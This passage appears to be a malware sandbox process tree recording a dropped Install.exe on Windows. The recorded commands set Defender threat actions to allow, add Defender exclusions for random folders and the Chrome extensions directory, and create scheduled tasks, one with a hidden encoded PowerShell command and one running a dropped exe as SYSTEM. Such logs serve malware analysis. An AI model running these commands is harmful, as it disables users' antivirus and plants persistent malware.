        /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        6⤵
        
        PID:6328
        
        \??\c:\windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        7⤵
        
        PID:6924

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:5508

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:5348

C:\Users\Admin\AppData\Local\Temp\7zSB110.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zSB110.tmp\Install.exe it /wtcdidMFOV 385118 /S
1⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- Drops file in System32 directory
PID:5428
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  PID:6244
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    PID:3316
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      PID:6944
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:6792
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    PID:5236
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      4⤵
      PID:5832
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:1832
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    PID:4996
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      PID:5372
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:6400
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
    3⤵
    PID:6484
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
      4⤵
      PID:2696
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:6452
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    PID:6880
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
      4⤵
      PID:5660
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:6964
      - C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        6⤵
        
        PID:7060
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:7088
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6164
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:6656
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6064
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3916
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2932
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3804
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2500
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6352
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3464
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5740
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:704
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4848
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2296
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2276
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4736
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5516
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:7164
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5068
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6292
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1040
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6868
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6524
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5188
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6704
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6708
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2716
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5136
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6976
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6132
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ADJLsahCU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ADJLsahCU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DQANlvmTAvZU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DQANlvmTAvZU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PZjcxajBIsNTC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PZjcxajBIsNTC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mWJfrhglotUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mWJfrhglotUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VyWMmqtuSNndeGVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VyWMmqtuSNndeGVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\" /t REG_DWORD /d 0 /reg:64;"
  2⤵
  - Drops file in System32 directory
  PID:6060
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5696
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:7116
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5240
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4576
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:6192
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3916
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1188
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3464
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4572
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4848
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4620
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VyWMmqtuSNndeGVB /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5664
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VyWMmqtuSNndeGVB /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5272
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:6876
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5884
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:6000
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1356
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\WPGfhLqOzAIwKSwi /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5412
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\WPGfhLqOzAIwKSwi /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5496
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gziqAlMOh" /SC once /ST 00:31:50 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Creates scheduled task(s)
  PID:5196
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gziqAlMOh"
  2⤵
  PID:5404
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gziqAlMOh"
  2⤵
  PID:5832
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "XyyyteIMwZeutaZuw" /SC once /ST 00:25:35 /RU "SYSTEM" /TR "\"C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\UlCYPbb.exe\" GH /hQJwdidTf 385118 /S" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Creates scheduled task(s)
  PID:3688
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "XyyyteIMwZeutaZuw"
  2⤵
  PID:6428

C:\Users\Admin\AppData\Local\Temp\7zSF30B.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zSF30B.tmp\Install.exe it /timdidUuUu 385118 /S
1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:5064
- C:\Windows\SysWOW64\cmd.exe
